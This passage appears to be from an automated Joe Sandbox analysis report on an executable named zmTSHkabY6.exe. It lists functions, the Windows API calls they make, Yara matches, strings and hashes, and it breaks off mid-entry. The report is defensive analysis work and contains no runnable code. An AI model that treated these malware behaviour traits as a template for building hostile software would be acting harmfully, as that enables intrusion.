                                                                    • API ID: ErrorLastValue___vcrt_
                                                                    • String ID:
                                                                    • API String ID: 3852720340-0
                                                                    • Opcode ID: 6119c639a046b9dd424e980e58b60d2be106995ff750bb25c6883d2720f1beb8
                                                                    • Instruction ID: 52215440b0484a5933a21afaa7d14eff0bbffcae32c408c1c48a71bd154173ad
                                                                    • Opcode Fuzzy Hash: 6119c639a046b9dd424e980e58b60d2be106995ff750bb25c6883d2720f1beb8
                                                                    • Instruction Fuzzy Hash: 81018832609711AFA6343FB47C859572A94EB01779730523AF52C761F2FF694C125354
                                                                    Function 0040ADA4 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,?,0040AD9B,0040A35F,00409999), ref: 0040ADB2
                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040ADC0
                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0040ADD9
                                                                    • SetLastError.KERNEL32(00000000,0040AD9B,0040A35F,00409999), ref: 0040AE2B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastValue___vcrt_
                                                                    • String ID:
                                                                    • API String ID: 3852720340-0
                                                                    • Opcode ID: 6119c639a046b9dd424e980e58b60d2be106995ff750bb25c6883d2720f1beb8
                                                                    • Instruction ID: f4b61bc4878066cd9e5532c4ff7823403916b0aca9ffed94e046062e6da044f3
                                                                    • Opcode Fuzzy Hash: 6119c639a046b9dd424e980e58b60d2be106995ff750bb25c6883d2720f1beb8
                                                                    • Instruction Fuzzy Hash: 6201D8722493125FE6342A76BC459572A54EB51779720033FF910B71E2EF3D4C32558E
                                                                    Function 10003DFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetLastError.KERNEL32(00000001,?,10003C01,10002DB0,100027A7,?,100029DF,?,00000001,?,?,00000001,?,100167D8,0000000C,10002AD8), ref: 10003E08
                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003E16
                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 10003E2F
                                                                    • SetLastError.KERNEL32(00000000,100029DF,?,00000001,?,?,00000001,?,100167D8,0000000C,10002AD8,?,00000001,?), ref: 10003E81
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3223708397.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.3223691367.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3223729109.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3223747769.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastValue___vcrt_
                                                                    • String ID:
                                                                    • API String ID: 3852720340-0
                                                                    • Opcode ID: 6af44c204d35e0e87e783e409bd385f4178bd984da96cbfbdded34095f80bc15
                                                                    • Instruction ID: cea4d4d1ab0609a38d25ccf127c64f3389598815618148a6298b3cccc824aafb
                                                                    • Opcode Fuzzy Hash: 6af44c204d35e0e87e783e409bd385f4178bd984da96cbfbdded34095f80bc15
                                                                    • Instruction Fuzzy Hash: 610124379083A66EF25BC7B49CC964B379AEB0D3F53208329F114410F8EFA29E45A244
                                                                    Function 00E96383 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • C:\Users\user\Desktop\zmTSHkabY6.exe, xrefs: 00E96388
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: C:\Users\user\Desktop\zmTSHkabY6.exe
                                                                    • API String ID: 0-808907004
                                                                    • Opcode ID: 93954dfdee92f46bb96adc8c87a9eb3aaf0f63e636dd7cac714efb5796973790
                                                                    • Instruction ID: 28e2db7de0142b84d6a9223a344b479e9a163da8f430ee11824f79b45caa2b1d
                                                                    • Opcode Fuzzy Hash: 93954dfdee92f46bb96adc8c87a9eb3aaf0f63e636dd7cac714efb5796973790
                                                                    • Instruction Fuzzy Hash: BF2180B1600105AF9F20BFA18D81D6B77EEAB453A8710A526F929B6250E731EC508761
                                                                    Function 0040BE17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,0040BED8,?,?,0042B000,00000000,?,0040C003,00000004,InitializeCriticalSectionEx,0041EAF4,InitializeCriticalSectionEx,00000000), ref: 0040BEA7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: FreeLibrary
                                                                    • String ID: api-ms-
                                                                    • API String ID: 3664257935-2084034818
                                                                    • Opcode ID: 8c81ecf0019ecd7373f14f2a550921ad389bcfade9b3345979a598c502b3af19
                                                                    • Instruction ID: 1d2ba87bd7351691bab4046b775a4f225d6c09ed93031ba1482b23a36008251d
                                                                    • Opcode Fuzzy Hash: 8c81ecf0019ecd7373f14f2a550921ad389bcfade9b3345979a598c502b3af19
                                                                    • Instruction Fuzzy Hash: 1B11C135A41620ABCB228B68DC45BDA7794EF02760F114632EE05B73C0D778EC058ADD
                                                                    Function 0040EF4F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,0040EF44,?,?,0040EF0C,00000000,74DEDF80,?), ref: 0040EF64
                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040EF77
                                                                    • FreeLibrary.KERNEL32(00000000,?,?,0040EF44,?,?,0040EF0C,00000000,74DEDF80,?), ref: 0040EF9A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                    • API String ID: 4061214504-1276376045
                                                                    • Opcode ID: 607d73432645c26095c79918e0b94193a9778d3018f0e4e6e685341166a2a245
                                                                    • Instruction ID: a9aeb9bb373945a448fb4c2f2a76f55d061337ba3b70deabe2e5838c542f66b1
                                                                    • Opcode Fuzzy Hash: 607d73432645c26095c79918e0b94193a9778d3018f0e4e6e685341166a2a245
                                                                    • Instruction Fuzzy Hash: E0F0A070A0421AFBCB119B52ED09BDEBF78EF00759F144071F905B21A0CB788E11DB98
                                                                    Function 10005FAA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,10005F5C,?,?,10005F24,?,?,?), ref: 10005FBF
                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10005FD2
                                                                    • FreeLibrary.KERNEL32(00000000,?,?,10005F5C,?,?,10005F24,?,?,?), ref: 10005FF5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3223708397.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.3223691367.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3223729109.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3223747769.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                    • API String ID: 4061214504-1276376045
                                                                    • Opcode ID: 72e1e31047de7c6f2cb357695238b525e407410b4f5b93aeb37e18346654144b
                                                                    • Instruction ID: ce5d81a5a20928f213bfffb098e7a6005668583a74e8757c7f390ca8b74bdc84
                                                                    • Opcode Fuzzy Hash: 72e1e31047de7c6f2cb357695238b525e407410b4f5b93aeb37e18346654144b
                                                                    • Instruction Fuzzy Hash: 1BF01C31904129FBEB06DB91CD0ABEE7AB9EB047D6F1041B4F501A21A4CBB5CE41DB90
                                                                    Function 1000A5DD Relevance: 7.7, APIs: 5, Instructions: 244COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,1000A899,00000000,00000000,00000000,00000001,?,?,?,?,00000001), ref: 1000A680
                                                                    • __alloca_probe_16.LIBCMT ref: 1000A736
                                                                    • __alloca_probe_16.LIBCMT ref: 1000A7CC
                                                                    • __freea.LIBCMT ref: 1000A837
                                                                    • __freea.LIBCMT ref: 1000A843
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3223708397.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.3223691367.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3223729109.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3223747769.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: __alloca_probe_16__freea$Info
                                                                    • String ID:
                                                                    • API String ID: 2330168043-0
                                                                    • Opcode ID: 6801c7cf1a2c1c6b356f2cb05e88654cbb9424f85dc0dbbe55d1f090f9a52ad6
                                                                    • Instruction ID: 1dd90d70d9504398cfa9d6ef4ea6864651e072268de8b4bf5549d7cf43e308ef
                                                                    • Opcode Fuzzy Hash: 6801c7cf1a2c1c6b356f2cb05e88654cbb9424f85dc0dbbe55d1f090f9a52ad6
                                                                    • Instruction Fuzzy Hash: C081A472D042569BFF11CE648C81ADE7BF5EF0B6D0F158265E904AB148DB369DC1CBA0
                                                                    Function 004136A0 Relevance: 7.7, APIs: 5, Instructions: 199COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __alloca_probe_16.LIBCMT ref: 00413724
                                                                    • __alloca_probe_16.LIBCMT ref: 004137EA
                                                                    • __freea.LIBCMT ref: 00413856
                                                                      • Part of subcall function 0041249E: RtlAllocateHeap.NTDLL(00000000,?,?,?,0040A15B,?,?,?,004010EC,?,004034A7,?,?,?), ref: 004124D0
                                                                    • __freea.LIBCMT ref: 0041385F
                                                                    • __freea.LIBCMT ref: 00413882
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1423051803-0
                                                                    • Opcode ID: 108019662ccab921f27eff110a88a80a1d8b3600edd5f6f257505aea3f790572
                                                                    • Instruction ID: 356f55c8d52bf468307c9bd9aee3ed648f54657124d7a114e97aef17e3d97ec8
                                                                    • Opcode Fuzzy Hash: 108019662ccab921f27eff110a88a80a1d8b3600edd5f6f257505aea3f790572
                                                                    • Instruction Fuzzy Hash: 6151D3B2600206ABEF20AF55CC41EEB36E9EF44755F15412EFD18E7290D738DE9186A8
                                                                    Function 1000AFB7 Relevance: 7.7, APIs: 5, Instructions: 199COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __alloca_probe_16.LIBCMT ref: 1000B03B
                                                                    • __alloca_probe_16.LIBCMT ref: 1000B101
                                                                    • __freea.LIBCMT ref: 1000B16D
                                                                      • Part of subcall function 100079EE: RtlAllocateHeap.NTDLL(00000000,10001F83,?,?,10002743,10001F83,?,10001F83,0007A120), ref: 10007A20
                                                                    • __freea.LIBCMT ref: 1000B176
                                                                    • __freea.LIBCMT ref: 1000B199
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3223708397.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.3223691367.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3223729109.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3223747769.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1423051803-0
                                                                    • Opcode ID: 08a43eba5b954a3f04cd68b018e4776cfa43d2eee8ce0c2eced5adaaebccb1f4
                                                                    • Instruction ID: ca0e6193c5ab93552cef367aef9b2c098b98f9a761b18089088d519bce5e91c7
                                                                    • Opcode Fuzzy Hash: 08a43eba5b954a3f04cd68b018e4776cfa43d2eee8ce0c2eced5adaaebccb1f4
                                                                    • Instruction Fuzzy Hash: 6651C072600616ABFB21CF64CC81EAF37E9EF456D0F624129FD14A7158EB34EC5197A0
                                                                    Function 00E82BB7 Relevance: 7.6, APIs: 5, Instructions: 113memorywindowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • VirtualProtect.KERNEL32(?,?,?,?), ref: 00E82C5F
                                                                    • GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,?,?), ref: 00E82C74
                                                                    • FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,?,?), ref: 00E82C82
                                                                    • LocalAlloc.KERNEL32(00000040,?,?,?,?,?), ref: 00E82C9D
                                                                    • OutputDebugStringA.KERNEL32(00000000,?,?), ref: 00E82CBC
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocDebugErrorFormatLastLocalMessageOutputProtectStringVirtual
                                                                    • String ID:
                                                                    • API String ID: 2509773233-0
                                                                    • Opcode ID: 98a23b1f51539c79b15504070a912fe8a1d772cf35a21b11453b2abeaae28325
                                                                    • Instruction ID: 44c8c2d7360d67ef724f928e1d0763aeac2f0711afcf5a7b42b5a390b2081b08
                                                                    • Opcode Fuzzy Hash: 98a23b1f51539c79b15504070a912fe8a1d772cf35a21b11453b2abeaae28325
                                                                    • Instruction Fuzzy Hash: E031E171B00004AFDB14EF68DC45FBAB7A8EF48704F0541ADEA09AB252DB31AD12CB94
                                                                    Function 10002986 Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3223708397.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.3223691367.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3223729109.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3223747769.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: dllmain_raw$dllmain_crt_dispatch
                                                                    • String ID:
                                                                    • API String ID: 3136044242-0
                                                                    • Opcode ID: c90a93295f6bc331d57bb8f47297671563acdadf013a8df03a89f4d1d37c88ce
                                                                    • Instruction ID: 86b98bd5048e9daedf5606c3f96c4c2c05ee8e367bee4de8e4e1682ebb6c2564
                                                                    • Opcode Fuzzy Hash: c90a93295f6bc331d57bb8f47297671563acdadf013a8df03a89f4d1d37c88ce
                                                                    • Instruction Fuzzy Hash: EA21A476E0526AAFFB32CF55CC41ABF3AA9EB85AD0F014115FC4867258CB309D419BD1
                                                                    Function 00E97248 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _free.LIBCMT ref: 00E97260
                                                                      • Part of subcall function 00E91D29: HeapFree.KERNEL32(00000000,00000000,?,00E972DB,?,00000000,?,?,?,00E97302,?,00000007,?,?,00E975E1,?), ref: 00E91D3F
                                                                      • Part of subcall function 00E91D29: GetLastError.KERNEL32(?,?,00E972DB,?,00000000,?,?,?,00E97302,?,00000007,?,?,00E975E1,?,?), ref: 00E91D51
                                                                    • _free.LIBCMT ref: 00E97272
                                                                    • _free.LIBCMT ref: 00E97284
                                                                    • _free.LIBCMT ref: 00E97296
                                                                    • _free.LIBCMT ref: 00E972A8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: 66f692938bcf18abe0cb3e5c7653619a9fabf3dc7bd25fd00b9023d19967cfd6
                                                                    • Instruction ID: f73dc15c1badf48fc9ca6b7f6132e0272184b69710bbe854e9812333b3f932a1
                                                                    • Opcode Fuzzy Hash: 66f692938bcf18abe0cb3e5c7653619a9fabf3dc7bd25fd00b9023d19967cfd6
                                                                    • Instruction Fuzzy Hash: 87F0C872638214AB8D38DB58F587C1633DDEB00720B652C45F498F7111C730FC908655
                                                                    Function 00416FE1 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _free.LIBCMT ref: 00416FF9
                                                                      • Part of subcall function 00411AC2: RtlFreeHeap.NTDLL(00000000,00000000,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?), ref: 00411AD8
                                                                      • Part of subcall function 00411AC2: GetLastError.KERNEL32(?,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?,?), ref: 00411AEA
                                                                    • _free.LIBCMT ref: 0041700B
                                                                    • _free.LIBCMT ref: 0041701D
                                                                    • _free.LIBCMT ref: 0041702F
                                                                    • _free.LIBCMT ref: 00417041
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: e9905c8b19ab3d426ab646f49b16c807e4d2b9b7b2a9eaa828597b4964810506
                                                                    • Instruction ID: 1bbc7c59558bdb80d40cd5d769ae83ba842cf1fe79b15496f27bd1d3c69b9f62
                                                                    • Opcode Fuzzy Hash: e9905c8b19ab3d426ab646f49b16c807e4d2b9b7b2a9eaa828597b4964810506
                                                                    • Instruction Fuzzy Hash: 2AF04432705240678534DB5DE486D967BE9AF44760758481BF508D7A12D73CFCD0465C
                                                                    Function 00E858D0 Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 476COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: O*$rB$rB
                                                                    • API String ID: 0-546290271
                                                                    • Opcode ID: f523bc33ae5dcf39d7c7f9cffc68d396c9ac6c1ced86010178b4c982eee15dc0
                                                                    • Instruction ID: 248d22cd97afc08f4a04f0a0f750261c10ad425cb8379819ef06128c001f35d0
                                                                    • Opcode Fuzzy Hash: f523bc33ae5dcf39d7c7f9cffc68d396c9ac6c1ced86010178b4c982eee15dc0
                                                                    • Instruction Fuzzy Hash: 1F12EF71D002089BDB19FBB4DC56BEDB7B4AF14304F6090A8E41DB7192EF359A48CBA1
                                                                    Function 00E8516B Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 383sleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00E893D7: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00E893E2
                                                                      • Part of subcall function 00E893D7: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00E8941F
                                                                    • __Init_thread_footer.LIBCMT ref: 00E851B2
                                                                      • Part of subcall function 00E8938D: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00E89397
                                                                      • Part of subcall function 00E8938D: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00E893CA
                                                                    • Sleep.KERNEL32(000007D0), ref: 00E8552A
                                                                    • Sleep.KERNEL32(000007D0), ref: 00E85544
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterLeaveSleep$Init_thread_footer
                                                                    • String ID: updateSW
                                                                    • API String ID: 500923978-2484434887
                                                                    • Opcode ID: a48b40eb8ce9b0f2e770e20945fe188cfd2cc4dc723a840eb928d6538466b87f
                                                                    • Instruction ID: 55de9b407592737afe2a31ad8fe6b9c66b580ff7697239d2de1ec5d9b7b6685d
                                                                    • Opcode Fuzzy Hash: a48b40eb8ce9b0f2e770e20945fe188cfd2cc4dc723a840eb928d6538466b87f
                                                                    • Instruction Fuzzy Hash: 20D1F372A015548BDF29FB24CC897ADB7B1AF41308F5451A9D80EBB292DB359EC4CB81
                                                                    Function 00E92A89 Relevance: 6.3, APIs: 4, Instructions: 320COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _strrchr
                                                                    • String ID:
                                                                    • API String ID: 3213747228-0
                                                                    • Opcode ID: 00bd01e052c6ca4725e3dc98c9fc8d994eb0987dbdd7d2e2c545ffa9104eb7c9
                                                                    • Instruction ID: 2dc1c79e1361ea48672e3607bfd80102a46266293a490833c513b1153dbea63a
                                                                    • Opcode Fuzzy Hash: 00bd01e052c6ca4725e3dc98c9fc8d994eb0987dbdd7d2e2c545ffa9104eb7c9
                                                                    • Instruction Fuzzy Hash: 4CB11232901286AFDF15CF28C881BFEBBE5EF55344F2491AEEA54BB241D6349D01CB60
                                                                    Function 00412822 Relevance: 6.3, APIs: 4, Instructions: 320COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: _strrchr
                                                                    • String ID:
                                                                    • API String ID: 3213747228-0
                                                                    • Opcode ID: ea5dc4856b585dd579de17702f7f9642f7d44acf4acc8e31691820c31d006a79
                                                                    • Instruction ID: 6012ccbf35aa319517377e765832e55e269021952583a9b626e33c473f35baf7
                                                                    • Opcode Fuzzy Hash: ea5dc4856b585dd579de17702f7f9642f7d44acf4acc8e31691820c31d006a79
                                                                    • Instruction Fuzzy Hash: A6B13571A002459FDB25CF68CA817EEBBE1EF55340F14816BD845EB341D2BC9992CB68
                                                                    Function 00E81AE7 Relevance: 6.3, APIs: 4, Instructions: 298networkfileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 00E81B6C
                                                                    • InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 00E81B8B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FileInternet$PointerRead
                                                                    • String ID:
                                                                    • API String ID: 3197321146-0
                                                                    • Opcode ID: f9ec063c9d2e41b3af08dc7f95bc4ff4171d8ea44204e87ef2b2e3f71c5be050
                                                                    • Instruction ID: 54f07a19010ebe5a48db3e34b97401c4b88572b47dd4be75b13ad4f94f1a82b5
                                                                    • Opcode Fuzzy Hash: f9ec063c9d2e41b3af08dc7f95bc4ff4171d8ea44204e87ef2b2e3f71c5be050
                                                                    • Instruction Fuzzy Hash: 72C15670A002189FEB25DF24CD85BEAB7B8FF49304F1041E9E90DA7691DB75AA85CF50
                                                                    Function 00E8B0EB Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AdjustPointer
                                                                    • String ID:
                                                                    • API String ID: 1740715915-0
                                                                    • Opcode ID: 9375933aa2df3e20f0ca1827bdd97f55dc499c02a50483b9e33265720776713f
                                                                    • Instruction ID: 2638cdfc69054edfa9018fdf84fea471ab4af643d8784ef4846bdf6b85133867
                                                                    • Opcode Fuzzy Hash: 9375933aa2df3e20f0ca1827bdd97f55dc499c02a50483b9e33265720776713f
                                                                    • Instruction Fuzzy Hash: 6E51D372A01602AFDB29AF50E895BBAB7A4FF04314F14502DE84DBB6A1D731AD51C750
                                                                    Function 0040AE84 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: AdjustPointer
                                                                    • String ID:
                                                                    • API String ID: 1740715915-0
                                                                    • Opcode ID: 9375933aa2df3e20f0ca1827bdd97f55dc499c02a50483b9e33265720776713f
